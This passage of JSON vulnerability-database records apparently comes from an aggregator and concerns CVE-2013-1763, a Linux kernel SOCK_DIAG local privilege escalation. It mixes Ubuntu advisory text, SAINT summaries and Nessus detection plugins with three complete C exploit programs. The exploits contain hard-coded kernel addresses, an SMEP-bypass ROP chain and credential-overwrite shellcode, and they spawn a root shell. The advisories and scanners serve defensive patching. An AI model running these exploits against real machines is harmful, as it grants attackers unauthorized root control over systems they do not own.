linux-image-3.5.0-25-highbank 3.5.0-25.39\r\n linux-image-3.5.0-25-omap 3.5.0-25.39\r\n linux-image-3.5.0-25-powerpc-smp 3.5.0-25.39\r\n linux-image-3.5.0-25-powerpc64-smp 3.5.0-25.39\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1750-1\r\n CVE-2013-1763\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/3.5.0-25.39\r\n\r\n\r\nAttached Message Part\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2013-03-02T00:00:00", "published": "2013-03-02T00:00:00", "id": "SECURITYVULNS:DOC:29114", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29114", "title": "[USN-1750-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-0871", "CVE-2012-4508", "CVE-2013-0190", "CVE-2013-1763", "CVE-2012-2669", "CVE-2013-0231"], "description": "Privilege escalation, information leak.", "edition": 1, "modified": "2013-03-02T00:00:00", "published": "2013-03-02T00:00:00", "id": "SECURITYVULNS:VULN:12888", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12888", "title": "Linux kernel security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 3.5.0-23 (Ubuntu 12.04.2 x64) - SOCK_DIAG SMEP Bypass Local Privilege Escalation", "edition": 1, "published": "2015-08-26T00:00:00", "title": "Linux Kernel 3.5.0-23 (Ubuntu 12.04.2 x64) - SOCK_DIAG SMEP Bypass Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2015-08-26T00:00:00", "id": "EXPLOITPACK:E0C7D9E17F3479DD89B304D4E8F8DBAE", "href": "", "sourceData": "/** \n * based on the exploit by SynQ\n *\n * Modified PoC for CVE-2013-1763 with SMEP bypass\n * Presentation: Practical SMEP Bypass Techniques on Linux\n * Vitaly Nikolenko\n * vnik@cyseclabs.com\n * \n * Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\n *\n * gcc sockdiag_smep.c -O2 -o pwn \n */\n\n/**\n EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ\n**/\n\n#include <unistd.h>\n#include <sys/socket.h>\n#include <netinet/tcp.h>\n#include <errno.h>\n#include <linux/if.h>\n#include <linux/filter.h>\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <linux/inet_diag.h>\n#include <sys/mman.h>\n#include <assert.h>\n//#include <linux/sock_diag.h>\n//#include <linux/unix_diag.h>\n//#include <linux/netlink.h>\n#include \"sock_diag.h\"\n#include \"unix_diag.h\"\n#include \"netlink.h\"\n\nunsigned long user_cs;\nunsigned long user_ss;\nunsigned long user_rflags;\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\nunsigned long sock_diag_handlers, nl_table;\n\nstatic void saveme() {\n\tasm(\n\t\"movq %%cs, %0\\n\"\n\t\"movq %%ss, %1\\n\"\n\t\"pushfq\\n\"\n\t\"popq %2\\n\"\n\t: \"=r\" (user_cs), \"=r\" (user_ss), \"=r\" (user_rflags) : : \"memory\" \t\t);\n}\n\nvoid shell(void) {\n\tif(!getuid())\n\t\tsystem(\"/bin/sh\");\n\n\texit(0);\n}\n\nstatic void restore() {\n\tasm volatile(\n\t\"swapgs ;\"\n\t\"movq %0, 0x20(%%rsp)\\t\\n\"\n\t\"movq %1, 0x18(%%rsp)\\t\\n\"\n\t\"movq %2, 0x10(%%rsp)\\t\\n\"\n\t\"movq %3, 0x08(%%rsp)\\t\\n\"\n\t\"movq %4, 0x00(%%rsp)\\t\\n\"\n\t\"iretq\"\n\t: : \"r\" (user_ss),\n\t \"r\" ((unsigned long)0x36000000),\n\t \"r\" (user_rflags),\n\t \"r\" (user_cs),\n\t \"r\" (shell)\n\t);\n}\n\nint __attribute__((regparm(3)))\nkernel_code()\n{\n\tcommit_creds(prepare_kernel_cred(0));\n\trestore();\n\t\n\treturn -1;\n}\n\nint main(int argc, char*argv[])\n{\n\tint fd;\n\n\tstruct sock_diag_handler {\n\t\t__u8 family;\n\t\tint (*dump)(void *a, void *b);\n\t};\n\n\tunsigned family;\n\tstruct {\n\t\tstruct nlmsghdr nlh;\n\t\tstruct unix_diag_req r;\n\t} req;\n\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\n\t\tprintf(\"Can't create sock diag socket\\n\");\n\t\treturn -1;\n\t}\n\n\tvoid *mapped;\n\tvoid *fakestruct;\n\tstruct sock_diag_handler a;\n\ta.dump = (void *)0xffffffff8100b74f;\n\n\tcommit_creds = (_commit_creds) 0xffffffff8107ee30;\n\tprepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;\n\n\tassert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000);\n\tmemcpy(fakestruct+0xad38, &a, sizeof(a));\n\n\tassert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000);\n\n\tunsigned long *fakestack = (unsigned long *)mapped;\n\t*fakestack ++= 0xffffffff01661ef4;\n\tint p;\n\tfor (p = 0; p < 0x1000000; p++)\n\t\t*fakestack ++= 0xffffffff8100ad9eUL;\n\t\n\tfakestack = (unsigned long *)(mapped + 0x7000000);\n\tprintf(\"[+] fake stack addr = %lx\\n\", (long unsigned)fakestack);\n\t*fakestack ++= 0xffffffff8133dc8fUL;\n\t*fakestack ++= 0x407e0;\n\t*fakestack ++= 0xffffffff810032edUL;\n\t*fakestack ++= 0xdeadbeef;\n\t*fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode\n\n\tmemset(&req, 0, sizeof(req));\n\treq.nlh.nlmsg_len = sizeof(req);\n\treq.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\n\treq.nlh.nlmsg_seq = 123456;\n\n\treq.r.sdiag_family = 45;\n\n\treq.r.udiag_states = -1;\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\n\n\tsaveme();\n\tif ( send(fd, &req, sizeof(req), 0) < 0) {\n\t\tprintf(\"bad send\\n\");\n\t\tclose(fd);\n\t\treturn -1;\n\t}\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.3 3.8 (Ubuntu Fedora 18) - sock_diag_handlers() Local Privilege Escalation (3)", "edition": 1, "published": "2013-02-24T00:00:00", "title": "Linux Kernel 3.3 3.8 (Ubuntu Fedora 18) - sock_diag_handlers() Local Privilege Escalation (3)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-02-24T00:00:00", "id": "EXPLOITPACK:5F70F8E747822C4EE26CF99F2739F154", "href": "", "sourceData": "/* \n* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8\n* bug found by Spender\n* poc by SynQ\n* \n* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux\n* using nl_table->hash.rehash_time, index 81\n* \n* Fedora 18 support added\n* \n* 2/2013\n*/\n\n#include <unistd.h>\n#include <sys/socket.h>\n#include <linux/netlink.h>\n#include <netinet/tcp.h>\n#include <errno.h>\n#include <linux/if.h>\n#include <linux/filter.h>\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <linux/sock_diag.h>\n#include <linux/inet_diag.h>\n#include <linux/unix_diag.h>\n#include <sys/mman.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\nunsigned long sock_diag_handlers, nl_table;\n\nint __attribute__((regparm(3)))\nkernel_code()\n{\n\tcommit_creds(prepare_kernel_cred(0));\n\treturn -1;\n}\n\nint jump_payload_not_used(void *skb, void *nlh)\n{\n\tasm volatile (\n\t\t\"mov $kernel_code, %eax\\n\"\n\t\t\"call *%eax\\n\"\n\t);\n}\n\nunsigned long\nget_symbol(char *name)\n{\n\tFILE *f;\n\tunsigned long addr;\n\tchar dummy, sym[512];\n\tint ret = 0;\n \n\tf = fopen(\"/proc/kallsyms\", \"r\");\n\tif (!f) {\n\t\treturn 0;\n\t}\n \n\twhile (ret != EOF) {\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **) &addr, &dummy, sym);\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sym);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sym)) {\n\t\t\tprintf(\"[+] resolved symbol %s to %p\\n\", name, (void *) addr);\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\tfclose(f);\n \n\treturn 0;\n}\n\nint main(int argc, char*argv[])\n{\n\tint fd;\n\tunsigned family;\n\tstruct {\n\t\tstruct nlmsghdr nlh;\n\t\tstruct unix_diag_req r;\n\t} req;\n\tchar\tbuf[8192];\n\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\n\t\tprintf(\"Can't create sock diag socket\\n\");\n\t\treturn -1;\n\t}\n\n\tmemset(&req, 0, sizeof(req));\n\treq.nlh.nlmsg_len = sizeof(req);\n\treq.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\n\treq.nlh.nlmsg_seq = 123456;\n\n\t//req.r.sdiag_family = 89;\n\treq.r.udiag_states = -1;\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\n\n\tif(argc==1){\n\t\tprintf(\"Run: %s Fedora|Ubuntu\\n\",argv[0]);\n\t\treturn 0;\n\t}\n\telse if(strcmp(argv[1],\"Fedora\")==0){\n\t commit_creds = (_commit_creds) get_symbol(\"commit_creds\");\n\t prepare_kernel_cred = (_prepare_kernel_cred) get_symbol(\"prepare_kernel_cred\");\n\t sock_diag_handlers = get_symbol(\"sock_diag_handlers\");\n\t nl_table = get_symbol(\"nl_table\");\n\t \n\t if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){\n\t\tprintf(\"some symbols are not available!\\n\");\n\t\texit(1);\n\t\t}\n\n\t family = (nl_table - sock_diag_handlers) / 4;\n\t printf(\"family=%d\\n\",family);\n\t req.r.sdiag_family = family;\n\t \n\t if(family>255){\n\t\tprintf(\"nl_table is too far!\\n\");\n\t\texit(1);\n\t\t}\n\t}\n\telse if(strcmp(argv[1],\"Ubuntu\")==0){\n\t commit_creds = (_commit_creds) 0xc106bc60;\n\t prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;\n\t req.r.sdiag_family = 81;\n\t}\n\n\tunsigned long mmap_start, mmap_size;\n\tmmap_start = 0x10000;\n\tmmap_size = 0x120000;\n\tprintf(\"mmapping at 0x%lx, size = 0x%lx\\n\", mmap_start, mmap_size);\n\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\n MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\n printf(\"mmap fault\\n\");\n exit(1);\n }\n\tmemset((void*)mmap_start, 0x90, mmap_size);\n\n\tchar jump[] = \"\\x55\\x89\\xe5\\xb8\\x11\\x11\\x11\\x11\\xff\\xd0\\x5d\\xc3\"; // jump_payload in asm\n\tunsigned long *asd = &jump[4];\n\t*asd = (unsigned long)kernel_code;\n\n\tmemcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));\n\n\tif ( send(fd, &req, sizeof(req), 0) < 0) {\n\t\tprintf(\"bad send\\n\");\n\t\tclose(fd);\n\t\treturn -1;\n\t}\n\n\tprintf(\"uid=%d, euid=%d\\n\",getuid(), geteuid() );\n\n\tif(!getuid())\n\t\tsystem(\"/bin/sh\");\n\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "description": "Added: 05/13/2014 \nCVE: [CVE-2013-1763](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763>) \nBID: [58137](<http://www.securityfocus.com/bid/58137>) \nOSVDB: [90604](<http://www.osvdb.org/90604>) \n\n\n### Background\n\nNetlink is a feature of the Linux kernel which allows communication between kernel and user space. \n\n### Problem\n\nAn array index error in the `**__sock_diag_rcv_msg**` function in the Linux kernel allows local users to gain root privileges by sending a Netlink message with a large family value. \n\n### Resolution\n\nUpgrade to Linux kernel 3.7.10 or higher or install the appropriate package update from the operating system vendor. \n\n### References\n\n<http://seclists.org/oss-sec/2013/q1/420> \n<https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.7.10> \n\n\n### Limitations\n\nExploit works on Ubuntu or Fedora and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "edition": 1, "modified": "2014-05-13T00:00:00", "published": "2014-05-13T00:00:00", "id": "SAINT:18A030A4FCD5D3FC247DC77100CC35FB", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_sock_diag", "type": "saint", "title": "Linux kernel __sock_diag_rcv_msg Netlink message privilege elevation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "description": "Added: 05/13/2014 \nCVE: [CVE-2013-1763](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763>) \nBID: [58137](<http://www.securityfocus.com/bid/58137>) \nOSVDB: [90604](<http://www.osvdb.org/90604>) \n\n\n### Background\n\nNetlink is a feature of the Linux kernel which allows communication between kernel and user space. \n\n### Problem\n\nAn array index error in the `**__sock_diag_rcv_msg**` function in the Linux kernel allows local users to gain root privileges by sending a Netlink message with a large family value. \n\n### Resolution\n\nUpgrade to Linux kernel 3.7.10 or higher or install the appropriate package update from the operating system vendor. \n\n### References\n\n<http://seclists.org/oss-sec/2013/q1/420> \n<https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.7.10> \n\n\n### Limitations\n\nExploit works on Ubuntu or Fedora and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2014-05-13T00:00:00", "published": "2014-05-13T00:00:00", "id": "SAINT:2FD3877414CB9609C42A165E6BCB9C92", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_sock_diag", "title": "Linux kernel __sock_diag_rcv_msg Netlink message privilege elevation", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:23", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "edition": 2, "description": "Added: 05/13/2014 \nCVE: [CVE-2013-1763](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763>) \nBID: [58137](<http://www.securityfocus.com/bid/58137>) \nOSVDB: [90604](<http://www.osvdb.org/90604>) \n\n\n### Background\n\nNetlink is a feature of the Linux kernel which allows communication between kernel and user space. \n\n### Problem\n\nAn array index error in the `**__sock_diag_rcv_msg**` function in the Linux kernel allows local users to gain root privileges by sending a Netlink message with a large family value. \n\n### Resolution\n\nUpgrade to Linux kernel 3.7.10 or higher or install the appropriate package update from the operating system vendor. \n\n### References\n\n<http://seclists.org/oss-sec/2013/q1/420> \n<https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.7.10> \n\n\n### Limitations\n\nExploit works on Ubuntu or Fedora and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2014-05-13T00:00:00", "published": "2014-05-13T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_sock_diag", "id": "SAINT:339ABC340D52FAD12C4D62B93D85D32F", "type": "saint", "title": "Linux kernel __sock_diag_rcv_msg Netlink message privilege elevation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T13:48:49", "description": "\u5f71\u54cd\u8303\u56f4\uff1aLinux Kernel 3.3-3.8 CVE-ID\uff1aCVE-2013-1763Linux\u5185\u6838\u5904\u7406netlink\u534f\u8bae\u65f6\uff0c\u5b58\u5728\u4e00\u5904\u5185\u5b58\u8d8a\u754c\u8bbf\u95ee\uff0c\u6210\u529f\u5229\u7528\u53ef\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u8fdb\u884c\u672c\u5730\u63d0\u6743\u3002\u6f0f\u6d1e\u4ee3\u7801\u5982\u4e0b\uff1astatic int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh){    int err;    struct sock_diag_req *req = NLMSG_DATA(nlh);    struct sock_diag_handler *hndl;    if (nlmsg_len(nlh) < sizeof(*req))        return -EINVAL;    hndl = sock_diag_lock_handler(req->sdiag_family);     sock_diag_handlers[reg->sdiag_family].    if (hndl == NULL)        err = -ENOENT;    else        err = hndl->dump(skb, nlh);     sock_diag_unlock_handler(hndl);    return err;}sock_diag_lock_handler\u6570\u7ec4\u6ca1\u6709\u68c0\u67e5\u4e0a\u8fb9\u754c\uff0c\u5bfc\u81f4\u901a\u8fc7\u6784\u9020\u53c2\u6570\u53ef\u4ee5\u63a7\u5236hndl\u6307\u9488\u3002 ", "published": "2014-07-01T00:00:00", "title": "Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86561", "id": "SSV:86561", "sourceData": "\n /* \r\n* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8\r\n* bug found by Spender\r\n* poc by SynQ\r\n* \r\n* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux\r\n* using nl_table->hash.rehash_time, index 81\r\n* \r\n* Fedora 18 support added\r\n* \r\n* 2/2013\r\n*/\r\n\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n\r\nint __attribute__((regparm(3))) kernel_code()\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n\r\nint main(int argc, char*argv[])\r\n{\r\n int fd;\r\n unsigned family;\r\n struct {\r\n struct nlmsghdr nlh;\r\n struct unix_diag_req r;\r\n } req;\r\n char buf[8192];\r\n\r\n if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n printf(\"Can't create sock diag socket\\n\");\r\n return -1;\r\n }\r\n\r\n memset(&req, 0, sizeof(req));\r\n req.nlh.nlmsg_len = sizeof(req);\r\n req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n req.nlh.nlmsg_seq = 123456;\r\n\r\n req.r.udiag_states = -1;\r\n req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n\r\n\r\n commit_creds = (_commit_creds) 0xc106bc60;\r\n prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;\r\n req.r.sdiag_family = 81;\r\n\r\n unsigned long mmap_start, mmap_size;\r\n mmap_start = 0x10000;\r\n mmap_size = 0x120000;\r\n printf(\"mmapping at 0x%lx, size = 0x%lx\\n\", mmap_start, mmap_size);\r\n\r\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n printf(\"mmap fault\\n\");\r\n exit(1);\r\n }\r\n memset((void*)mmap_start, 0x90, mmap_size);\r\n\r\n char jump[] = \"\\x55\\x89\\xe5\\xb8\\x11\\x11\\x11\\x11\\xff\\xd0\\x5d\\xc3\";\r\n unsigned long *asd = &jump[4];\r\n *asd = (unsigned long)kernel_code;\r\n\r\n memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));\r\n\r\n if ( send(fd, &req, sizeof(req), 0) < 0) {\r\n printf(\"bad send\\n\");\r\n close(fd);\r\n return -1;\r\n }\r\n\r\n printf(\"uid=%d, euid=%d\\n\",getuid(), geteuid() );\r\n\r\n if(!getuid())\r\n system(\"/bin/sh\");\r\n}\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86561"}], "nessus": [{"lastseen": "2021-01-01T06:39:17", "description": "Mathias Krause discovered a bounds checking error for netlink\nmessages requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user\ncould exploit this flaw to crash the system or run programs as an\nadministrator.", "edition": 22, "published": "2013-02-27T00:00:00", "title": "USN-1751-1 : linux-ti-omap4 vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux"], "id": "UBUNTU_USN-1751-1.NASL", "href": "https://www.tenable.com/plugins/nessus/64911", "sourceData": "# This script was automatically generated from Ubuntu Security\n# Notice USN-1751-1. It is released under the Nessus Script \n# Licence.\n#\n# Ubuntu Security Notices are (C) Canonical, Inc.\n# See http://www.ubuntu.com/usn/\n# Ubuntu(R) is a registered trademark of Canonical, Inc.\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64911);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/01/09 14:34:06 $\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_xref(name:\"USN\", value:\"1751-1\");\n\n script_name(english:\"USN-1751-1 : linux-ti-omap4 vulnerability\");\n script_summary(english:\"Checks dpkg output for updated package(s)\");\n\n script_set_attribute(attribute:\"synopsis\", value: \n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"Mathias Krause discovered a bounds checking error for netlink\nmessages requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user\ncould exploit this flaw to crash the system or run programs as an\nadministrator.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/usn-1751-1/\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/27\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(\"Ubuntu Security Notice (C) 2013 Canonical, Inc. / NASL script (C) 2013-2015 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"ubuntu.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/Ubuntu/release\")) exit(0, \"The host is not running Ubuntu.\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) exit(1, \"Could not obtain the list of installed packages.\");\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-220-omap4\", pkgver:\"3.5.0-220.29\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:ubuntu_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:17", "description": "Mathias Krause discovered a bounds checking error for netlink messages\nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could\nexploit this flaw to crash the system or run programs as an\nadministrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-02-27T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-1749-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1749-1.NASL", "href": "https://www.tenable.com/plugins/nessus/64909", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1749-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64909);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_bugtraq_id(58137);\n script_xref(name:\"USN\", value:\"1749-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-1749-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mathias Krause discovered a bounds checking error for netlink messages\nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could\nexploit this flaw to crash the system or run programs as an\nadministrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1749-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.5-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n 